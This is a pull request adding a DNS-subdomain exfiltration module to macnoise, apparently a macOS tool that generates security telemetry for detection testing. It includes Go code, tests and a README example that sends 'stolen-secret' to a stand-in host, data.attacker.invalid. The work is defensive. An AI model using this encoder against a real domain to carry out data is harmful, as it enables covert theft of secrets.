### PR TITLE
feat: add net_dns_exfil for DNS subdomain exfiltration telemetry

### DIFF
--- a/README.md
+++ b/README.md
@@ -42,7 +42,7 @@ make build
 
 | Category | Description | Modules |
 |----------|-------------|---------|
-| `network` | Outbound connections, DNS, beaconing, listeners, reverse shells, exfiltration | net_connect, net_listen, net_beacon, net_revshell, net_dns, net_exfil |
+| `network` | Outbound connections, DNS, beaconing, listeners, reverse shells, exfiltration | net_connect, net_listen, net_beacon, net_revshell, net_dns, net_dns_exfil, net_exfil |
 | `process` | Process spawning, signal delivery, dylib injection, discovery, Gatekeeper bypass, osascript | proc_spawn, proc_signal, proc_inject, proc_discovery, proc_gatekeeper, proc_osascript |
 | `file` | File creation, modification, credential file and keychain reads, archiving, hiding | file_create, file_modify, file_browser_creds, file_cred_files, file_keychain_copy, file_archive, file_hide |
 | `tcc` | TCC permission probes (FDA, Contacts, Keychain, Accessibility, Screen Recording) | tcc_fda, tcc_contacts, tcc_keychain, tcc_accessibility, tcc_screen_recording |

--- a/internal/audit/classify.go
+++ b/internal/audit/classify.go
@@ -51,7 +51,7 @@ func Classify(category, eventType string) Classification {
 		return Classification{4002, "HTTP Activity", 4, "Network Activity", 3, "Get"}
 	case "http_post_exfil":
 		return Classification{4002, "HTTP Activity", 4, "Network Activity", 6, "Post"}
-	case "dns_lookup":
+	case "dns_lookup", "dns_exfil_query":
 		return Classification{4003, "DNS Activity", 4, "Network Activity", 1, "Query"}
 	}
 

--- a/internal/audit/classify_test.go
+++ b/internal/audit/classify_test.go
@@ -15,6 +15,7 @@ func TestClassify(t *testing.T) {
 	}{
 		// network
 		{"network", "dns_lookup", 4003, 1},
+		{"network", "dns_exfil_query", 4003, 1},
 		{"network", "http_get", 4002, 3},
 		{"network", "http_beacon", 4002, 3},
 		{"network", "http_post_exfil", 4002, 6},

--- a/modules/network/README.md
+++ b/modules/network/README.md
@@ -27,6 +27,14 @@ DNS resolution of configurable domains. Maps to T1071.004.
 ### `net_revshell`
 Connects a shell to a remote listener (connection refused is expected without one). Maps to T1059.004.
 
+### `net_dns_exfil`
+Encodes a payload into base32 DNS subdomain labels and resolves each query. The `.invalid` TLD (RFC 6761) means queries never leave the resolver unless the base domain is overridden. Maps to T1048.003.
+
+```bash
+macnoise run net_dns_exfil
+macnoise run net_dns_exfil --param payload="stolen-secret" --param base_domain="data.attacker.invalid"
+```
+
 ### `net_exfil`
 Sends an HTTP POST with a randomly-generated dummy payload to a target URL. Records request size, response status, and elapsed time. Connection refused is valid telemetry — no listener required. Maps to T1041.
 

--- a/modules/network/dns_exfil.go
+++ b/modules/network/dns_exfil.go
@@ -1,0 +1,153 @@
+package network
+
+import (
+	"context"
+	"encoding/base32"
+	"fmt"
+	"net"
+	"strings"
+
+	"github.com/0xv1n/macnoise/internal/output"
+	"github.com/0xv1n/macnoise/pkg/module"
+)
+
+const (
+	dnsLabelMax        = 63
+	dnsNameMax         = 253
+	defaultExfilDomain = "c2.exfil.invalid"
+)
+
+type netDNSExfil struct{}
+
+func (n *netDNSExfil) Info() module.ModuleInfo {
+	return module.ModuleInfo{
+		Name:        "net_dns_exfil",
+		Description: "Encodes a payload into DNS subdomain labels and resolves each query to generate DNS exfiltration telemetry",
+		Category:    module.CategoryNetwork,
+		Tags:        []string{"dns", "exfiltration", "subdomain", "encoding"},
+		Privileges:  module.PrivilegeNone,
+		MITRE: []module.MITRE{
+			{Technique: "T1048", SubTech: ".003", Name: "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol"},
+		},
+		Author:   "0xv1n",
+		MinMacOS: "12.0",
+	}
+}
+
+func (n *netDNSExfil) ParamSpecs() []module.ParamSpec {
+	return []module.ParamSpec{
+		{
+			Name:         "payload",
+			Description:  "String to exfiltrate via DNS subdomain encoding",
+			Required:     false,
+			DefaultValue: "macnoise-exfil-test",
+			Example:      "stolen-secret-data",
+		},
+		{
+			Name:         "base_domain",
+			Description:  "Base domain appended to each query (use .invalid TLD for offline safety)",
+			Required:     false,
+			DefaultValue: defaultExfilDomain,
+			Example:      "data.attacker.invalid",
+		},
+	}
+}
+
+func (n *netDNSExfil) CheckPrereqs() error { return nil }
+
+// encodeExfilPayload base32-encodes a payload and returns it lowercased
+// with padding stripped. The resulting charset (a-z2-7) is DNS-safe.
+func encodeExfilPayload(payload string) string {
+	encoded := base32.StdEncoding.EncodeToString([]byte(payload))
+	return strings.ToLower(strings.TrimRight(encoded, "="))
+}
+
+// chunkExfilLabels splits encoded into DNS labels of at most max chars.
+func chunkExfilLabels(encoded string, max int) []string {
+	var chunks []string
+	for len(encoded) > 0 {
+		end := max
+		if end > len(encoded) {
+			end = len(encoded)
+		}
+		chunks = append(chunks, encoded[:end])
+		encoded = encoded[end:]
+	}
+	return chunks
+}
+
+// exfilQueries builds the DNS names for exfiltration. Each name is
+// <chunk>.<seq>.<baseDomain>, with the chunk label capped at dnsLabelMax
+// and the total name at dnsNameMax. Chunks that would exceed the name
+// limit are dropped.
+func exfilQueries(payload, baseDomain string) []string {
+	encoded := encodeExfilPayload(payload)
+	chunks := chunkExfilLabels(encoded, dnsLabelMax)
+	queries := make([]string, 0, len(chunks))
+	for i, chunk := range chunks {
+		name := fmt.Sprintf("%s.%s.%s", chunk, fmt.Sprintf("%d", i), baseDomain)
+		if len(name) <= dnsNameMax {
+			queries = append(queries, name)
+		}
+	}
+	return queries
+}
+
+func (n *netDNSExfil) Generate(ctx context.Context, params module.Params, emit module.EventEmitter) error {
+	payload := params.Get("payload", "macnoise-exfil-test")
+	baseDomain := params.Get("base_domain", defaultExfilDomain)
+	info := n.Info()
+
+	queries := exfilQueries(payload, baseDomain)
+	resolver := net.DefaultResolver
+	for i, qname := range queries {
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		default:
+		}
+
+		ev := output.NewEvent(info, "dns_exfil_query", false,
+			fmt.Sprintf("exfil query %d/%d: %s", i+1, len(queries), qname))
+		_, err := resolver.LookupHost(ctx, qname)
+		if err != nil {
+			ev.Success = true
+			ev.Message = fmt.Sprintf("exfil query %d/%d failed (telemetry generated): %s", i+1, len(queries), qname)
+			ev = output.WithDetails(ev, map[string]any{
+				"query":       qname,
+				"chunk_index": i,
+				"total":       len(queries),
+				"base_domain": baseDomain,
+			})
+			ev = output.WithOutcome(ev, module.OutcomeDenied, err)
+		} else {
+			ev.Success = true
+			ev.Message = fmt.Sprintf("exfil query %d/%d resolved: %s", i+1, len(queries), qname)
+			ev = output.WithDetails(ev, map[string]any{
+				"query":       qname,
+				"chunk_index": i,
+				"total":       len(queries),
+				"base_domain": baseDomain,
+			})
+		}
+		emit(ev)
+	}
+	return nil
+}
+
+func (n *netDNSExfil) DryRun(params module.Params) []string {
+	payload := params.Get("payload", "macnoise-exfil-test")
+	baseDomain := params.Get("base_domain", defaultExfilDomain)
+	queries := exfilQueries(payload, baseDomain)
+	steps := make([]string, len(queries))
+	for i, q := range queries {
+		steps[i] = fmt.Sprintf("DNS resolve: %s", q)
+	}
+	return steps
+}
+
+func (n *netDNSExfil) Cleanup() error { return nil }
+
+func init() {
+	module.Register(&netDNSExfil{})
+}

--- a/modules/network/dns_exfil_test.go
+++ b/modules/network/dns_exfil_test.go
@@ -11,7 +11,7 @@ import (
 func TestEncodeExfilPayload_DNSSafe(t *testing.T) {
 	encoded := encodeExfilPayload("macnoise-exfil-test")
 	for _, c := range encoded {
-		if !((c >= 'a' && c <= 'z') || (c >= '2' && c <= '7')) {
+		if (c < 'a' || c > 'z') && (c < '2' || c > '7') {
 			t.Fatalf("encoded payload contains non-DNS-safe char %q: %s", c, encoded)
 		}
 	}

--- a/modules/network/dns_exfil_test.go
+++ b/modules/network/dns_exfil_test.go
@@ -1,0 +1,95 @@
+package network
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+
+	"github.com/0xv1n/macnoise/pkg/module"
+)
+
+func TestEncodeExfilPayload_DNSSafe(t *testing.T) {
+	encoded := encodeExfilPayload("macnoise-exfil-test")
+	for _, c := range encoded {
+		if !((c >= 'a' && c <= 'z') || (c >= '2' && c <= '7')) {
+			t.Fatalf("encoded payload contains non-DNS-safe char %q: %s", c, encoded)
+		}
+	}
+}
+
+func TestEncodeExfilPayload_NoPadding(t *testing.T) {
+	encoded := encodeExfilPayload("test")
+	if strings.Contains(encoded, "=") {
+		t.Fatalf("encoded payload contains padding: %s", encoded)
+	}
+}
+
+func TestChunkExfilLabels_RespectMax(t *testing.T) {
+	input := strings.Repeat("a", 200)
+	chunks := chunkExfilLabels(input, 63)
+	for i, chunk := range chunks {
+		if len(chunk) > 63 {
+			t.Errorf("chunk %d has %d chars, max is 63", i, len(chunk))
+		}
+	}
+	joined := strings.Join(chunks, "")
+	if joined != input {
+		t.Error("chunks do not reassemble to original")
+	}
+}
+
+func TestChunkExfilLabels_ShortInput(t *testing.T) {
+	chunks := chunkExfilLabels("abc", 63)
+	if len(chunks) != 1 || chunks[0] != "abc" {
+		t.Errorf("short input produced %v, want [abc]", chunks)
+	}
+}
+
+func TestExfilQueries_DefaultPayload(t *testing.T) {
+	queries := exfilQueries("macnoise-exfil-test", defaultExfilDomain)
+	if len(queries) == 0 {
+		t.Fatal("expected at least one query")
+	}
+	for i, q := range queries {
+		if !strings.HasSuffix(q, "."+defaultExfilDomain) {
+			t.Errorf("query %d missing base domain suffix: %s", i, q)
+		}
+		if len(q) > dnsNameMax {
+			t.Errorf("query %d exceeds DNS name max (%d): %s", i, len(q), q)
+		}
+		parts := strings.SplitN(q, ".", 2)
+		if len(parts[0]) > dnsLabelMax {
+			t.Errorf("query %d label exceeds 63 chars (%d): %s", i, len(parts[0]), q)
+		}
+	}
+}
+
+func TestExfilQueries_ContainsSequenceNumber(t *testing.T) {
+	queries := exfilQueries("macnoise-exfil-test", defaultExfilDomain)
+	for i, q := range queries {
+		seq := strings.SplitN(q, ".", 3)[1]
+		want := fmt.Sprintf("%d", i)
+		if seq != want {
+			t.Errorf("query %d has seq %q, want %q", i, seq, want)
+		}
+	}
+}
+
+func TestExfilQueries_NameTooLong(t *testing.T) {
+	longDomain := strings.Repeat("x", 200) + ".invalid"
+	queries := exfilQueries("test", longDomain)
+	for _, q := range queries {
+		if len(q) > dnsNameMax {
+			t.Errorf("query exceeds DNS name max: %s", q)
+		}
+	}
+}
+
+func TestDNSExfilDryRunMatchesQueries(t *testing.T) {
+	mod := &netDNSExfil{}
+	steps := mod.DryRun(module.Params{})
+	queries := exfilQueries("macnoise-exfil-test", defaultExfilDomain)
+	if len(steps) != len(queries) {
+		t.Errorf("dry run listed %d steps, want %d", len(steps), len(queries))
+	}
+}


### PR DESCRIPTION
Adds net_dns_exfil, which base32-encodes a payload into DNS subdomain labels and resolves each query. Uses .invalid TLD by default so no traffic leaves the resolver. Maps to T1048.003, the last audit loose end from the roadmap.